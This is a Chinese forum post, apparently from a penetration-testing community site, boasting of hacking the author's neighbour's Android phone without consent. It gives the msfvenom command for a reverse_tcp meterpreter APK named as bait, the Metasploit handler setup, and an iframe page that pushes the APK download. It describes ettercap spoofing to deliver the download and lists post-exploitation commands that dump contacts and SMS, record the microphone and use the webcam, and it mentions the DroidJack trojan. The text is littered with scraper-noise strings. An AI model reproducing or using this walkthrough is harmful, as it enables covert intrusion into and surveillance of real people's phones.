中国网络渗透测试联盟

标题: metasploit+ettercap中间人攻击成功入侵邻居手机 [打印本页]
作者: admin    时间: 2018-10-20 20:30
标题: metasploit+ettercap中间人攻击成功入侵邻居手机

& { V; \' J- O- p. W( z 五、msf+ettercap入侵邻居安卓手机 ; h% |. p) }+ {) ^( b

6 m C3 b) |- Z: L6 ~/ j5 C4 F- a

+ L$ D$ V" c4 h: `6 w 首先启动msf . h% d. I/ x1 _( p9 i

; ]7 Y/ I' T$ @/ I

$ r+ _8 C$ L& s% F( ?3 H! o. k 先用kali生成一个安卓木马,如下命令: 2 x; Y* |1 x* o1 |1 G

) N) r& z; ~/ J2 K/ J x' e3 V

$ F. x2 u$ b: B Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk # L& W* `! t- j. [

& s a: W( |6 b1 [% c

& c7 w9 E) r0 G" Y0 O& n. {; }( S3 l# @3 N 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 + `5 `2 U4 B# K5 g" c; y. A0 `

" h/ @# F1 y& j

. a4 z5 B$ ?7 R6 C9 F p 然后进入msf * @1 h2 Y0 _2 O5 \* w9 }

" z% t7 K' c. C+ f9 F

- C) R+ l# H. }7 C# `' W use exploit/multi/handler ; f' O. s u" ]7 i8 m0 S* _

, |: K: z. U$ N( d5 Y

" Q% E3 {1 ?# [ set payload android/meterpreter/reverse_tcp 7 }. A0 A% ]7 O8 L, u: U

, U, j0 G' x$ X, M' A& [* |& j* I

5 n1 d; y! [: f! A set LHOST 192.168.0.109 //ipkailiip / G1 D5 m" ?3 h4 S6 M; x, J

7 `6 ^( A1 T$ b# S- f5 E- W

. f7 k3 w+ w6 K. _ set LPORT 44444 //端口一定要与前面生成的木马的端口一致 8 F3 w; Z2 P3 P/ y! ^

" }- D8 R$ l, I% t6 ]1 `7 q# f9 h

4 m5 ^% Q1 }8 Z% ^ Exploit # v$ o- o3 a Y5 M: y

$ a0 Z! K5 e0 f! i% P

0 w" j: S! E/ q! G# |0 X( t' H   8 g; S0 T- U2 |

2 H* E* Z7 n! n1 p8 {9 Z

3 N! O4 O# u' ^3 H 下面我们开启ettercap -G . l3 {" f. j4 U3 v# J7 s

# S, R" h# {% ~& o. u

; L! ]1 V7 J& _- u3 h) p8 I2 _ 我物理IP 3 F, E$ H3 e* |( U& s4 u0 y

# o4 x* l5 c6 @/ x. Z

+ g M- C! H- k' s+ D8 Y+ J: i   . M b8 _% y+ K' U& Z; q, r! i g

E6 z% |- _- T! u2 V8 F

2 L1 W9 T7 i; b: y9 l$ v/ S 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 4 ^- E# M7 ]- N1 g6 r) E

3 W8 } v7 L; @( B

) u2 P- x: \9 O) y) B: d 下面我们来设置一下 5 ?1 G3 e2 x4 _" f3 n; i$ h: `

' v/ ^- n+ y8 u! N6 G7 s" k, j

- e2 |; Q" u' s, P I   4 B% N* n) i9 I( r2 D9 k

6 X% v6 U" ~8 g7 o6 a

+ a# Y- G) W- ?% o 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, - M u7 ~* Y# `1 }5 ]' k) ] A

. J$ d6 F" q4 N$ ?

' @& Z- d6 h6 U; i, _. f! m   ! _1 g! D0 a/ v# b" c2 _

/ n1 ]9 V' k" d8 [' ?. C

7 x" Z" j4 i8 I7 \   * r' y6 T9 ?0 {( z

7 F/ a# V s$ v7 j

! y; Q/ {8 @( e5 H/ i# D   * l" b0 ~6 W. {2 }( _

# G s; E5 ]9 g. x

# I1 [# M; K# |1 {% U# M   ' P& h; k4 X. d- P

% ?4 S* x6 Y+ I4 K I

" n$ H0 v6 I* @7 X$ b }8 @* {   ! d+ W# T5 }, B! y3 N) s! b

+ S+ t3 a$ M: o& l+ ?- a X' v8 g

2 Y) V# _* f7 z6 g) j/ G: Y   8 u+ L0 J( N; O+ a3 b5 ^! V5 H

% z. }. Z# `. @/ C

9 z1 A8 ~0 i6 t" z   - y+ ]/ W/ D0 T" O0 Z$ Y% X( r

" W/ t( l0 @* d5 G$ i

* Y3 o. {% `2 v   * B. R9 Y! ?: ~, ^8 j

& Q( _0 @: a0 ~! j6 Z7 e: z# u

$ w7 q B+ }) K1 p4 O: A0 |! b2 N i   ) {) Y4 R/ S; b: g8 S

' v$ O+ w' L6 T, c6 u- [* L o

7 ~! ]4 k% x+ }) X$ u3 ^   % y" N/ w$ @. d- x$ l1 `. D* E

3 Y c$ x: Z% f, _: b

# J# M |% q, K9 {4 o) |* T% |   . Z1 z+ m. s# {9 ]3 w

) a6 f, J3 l7 A* X- I! n

# y( U2 L( ^ Q a+ P" `   , C7 ~7 O+ g0 D; _

# N; y# c3 k- U5 E3 f

, d4 t( C1 Y3 {   . A+ @' u! y# \3 t5 Q4 @0 O

- X& p# B; ?1 F

5 D5 n9 C9 n/ ^, G 下面我们开始攻击 # V9 ~1 J) Q( P% g4 z% u4 \# w9 n

; l- A- s+ j+ E Y$ p' I/ ?: [+ k

; X3 O6 ?0 ~7 u" F   $ ?. c3 N# q$ | z; n" R

9 @* f: d4 U/ l7 `2 _" P

/ I W8 L* f1 ~1 Q" R! P; A$ g   - E; V; Y& }5 J4 F& v% s

- t q6 f& t" H4 s& e2 R

+ m: F4 b! [4 w# R+ N. x4 t   . l& T' }# D' a! j

; y; a+ @7 `8 J5 m% P% ~: ^

, D* w& N$ t: C5 {' W% o   ; H7 e4 n- \; G3 g6 k" s3 Z1 g

4 K3 G6 o, M9 Z3 L0 e

7 G! ?, m3 d/ K* ^   % l |& b2 i! l6 e& r% v: s

( y, G8 }9 p; L3 |( ~, M

" E# N* D% K3 m K: e0 U 大概过了5分钟多,发现反弹成功了 / D/ G& x* a% i, A! `4 J# n* m7 m" y

- y* M5 u% j1 p9 N* k. Y: Z0 C. W

( B$ m% P( E* Z8 D   + ], Q* A, P6 A2 p; Q, A" a

. Z' P$ k5 m; e$ e H

3 |; I- u$ N$ j1 _) s. q9 C   & r, T# v$ u) F0 V7 n

0 D& ^9 M% ~8 n- Z. w$ ^

, \- Y; D9 P) I: ^   9 N. e v0 i. F3 ?( @3 d

; }! ^7 e8 E2 z: e/ f) S

% }, I) w, N) W8 F n4 ?3 \, u: z   % X; ` ~5 } u$ L0 `

b: ?% N8 R9 \* `) O4 ^

9 n$ U! g E( \* N7 w4 _8 T. ]+ D   7 K/ C- t0 g2 D) K/ b/ Z. ~

+ Z& E9 G! K9 G$ }% h4 W* H

+ j3 s" Z& S0 y6 w8 {# ?   / H( d8 Z; [1 i4 l

: K! i4 ^4 `( e# q; F$ k% ^

* p: I' }" C1 Y# k# I, S   # F1 v9 }& T/ C9 u) w! R h3 Y

7 w( @9 }1 U5 D5 `" ^6 ^

$ I2 l- D7 c& w- @ 执行命令 ' C' J8 L+ t2 H! c, N% J4 x' J' f

* c! B) v$ K' Z" Z7 N

G3 B2 g ?$ }, O. O7 O0 B   " @$ T; n( v( s7 N

% g( N1 |) z3 E. I5 | @& y

- A7 J5 O: F0 `, ^% ] dump_contacts    --》这个是导出电话 ' ^; c8 K6 ^" x; W6 o. \

8 o1 D6 n9 E' e# I. g

/ r$ G/ i4 @3 n) H! z3 b dump_sms --》这个是导出信息 9 e3 m8 d: b+ u( P

9 l7 h/ N. E! b" e+ _

& ?, _+ ~! K- G: v4 f record_mic     Record audio from the default microphone for X seconds ) ]; @& J) U0 `5 N, i0 x; I4 r

& S( _; @; l& \/ i

, O0 p0 z- m" k6 t3 @     webcam_chat    Start a video chat 0 M- j9 C; x, [: o S, E; ~

% k7 u n1 C; F1 |2 l# l6 X

& r0 i( D8 t# x& }8 e1 F& G     webcam_list    List webcams % |- r& Q% L+ ^9 F8 l8 k% c

b9 ^; Z, P$ r7 ?. W% f$ x/ F2 F

' ^6 o* Q, s( w. y1 j     webcam_snap    Take a snapshot from the specified webcam ' D: ?, C* m) t* m

4 z- L2 |: g7 G, v

5 t1 v4 |, H m; Q8 U$ b+ ^ webcam_stream  lay a video stream from the specified webcam " h! B0 p( f1 x) x

# p8 u: g) u7 r; w

r: ?, v& l/ f. o   ! x4 X# p) [* _! R. ?& F, Z' _" n

* i/ i6 \( T2 T! R) T1 |5 c- b8 `

" U' Y+ @7 c9 h, t6 f% i5 I; x; j   3 X) o& u }2 @4 w

0 }1 ?# y8 g- ~

5 k; p( i1 i: c2 ]3 L9 m3 M 我们打开看一下电话薄, 8 h+ a* v2 ]: I% y4 F+ T

5 _0 b" C+ q2 u$ S3 z7 z

6 M) V/ O) E! x% P$ `   ! T) {8 l* i0 L" A- p

$ \/ q- ]% R$ Q: o# p1 w& D" J- _8 u

# f: B4 @, s# P# W# e2 G8 w) _   3 c, ]2 u5 b( n

1 `! V/ Q( N2 W$ _/ J+ _

3 N1 Y" X! X# m: f; ^   3 n( m5 G6 d; Q9 x4 V

' D5 y6 u$ b8 b% r' U% O6 o

6 B3 z$ v8 l% T: a+ Z   ! n) \- C- f7 M, ^. d

9 d9 p0 S0 [, f

4 i% }1 O8 n9 q7 G3 B& A" q4 |. c   & z9 P' e6 N% C- I& G& V+ Q

- h+ j, n5 K0 n3 G1 M

E( ~ Q& V: g/ e   * M' ^, z' T. x+ L' q

4 c/ z: a* E9 n

, A. x7 p. b) u5 {+ B 我们同时欺骗成DroidJack木马,使用方法如图: ; Y7 o8 ~" ~, a" S2 }

5 A+ P2 e- a* {4 Z8 {. z

8 Y) E5 O+ m2 _! x1 P4 d   5 s- ~! A. @2 C* J( K

% I3 o& r8 z) g6 n$ V2 I: p- N8 T1 X

4 y6 m6 f) g* T" e" i   ' {# O# A$ X& v$ `

& \7 i) V) l" ?/ y

# R/ ~/ `1 \2 w+ A% {   * a/ A/ z7 t- P; z2 @# }

# x$ T, x" C; X& f7 M

5 }2 W" N( {' Q5 L0 R9 ]8 F 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 " Q7 U. O! Q2 l, }/ O9 d- K

( I- [! y& z4 C m, f/ R# R

8 ^' W# g; _- h& J   6 O% g0 w$ |3 b: N

6 H; G* o6 |2 h8 y. G% V

4 x( E- E2 x" A& D   1 G# t' d7 _& W @

" D. ?1 P- R- F4 X

4 k8 c, q/ R$ v; F8 |! T   6 H6 c8 E* {5 e Z! D3 A# W

5 Z& \: C9 |9 R) [4 n; N

: m& \: E4 j& V 2 R* X/ n5 _- i: j

; [1 m! c7 R8 j

! B( f+ S3 T& F
% h" `! k7 f3 o, p( l5 P5 m* @





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2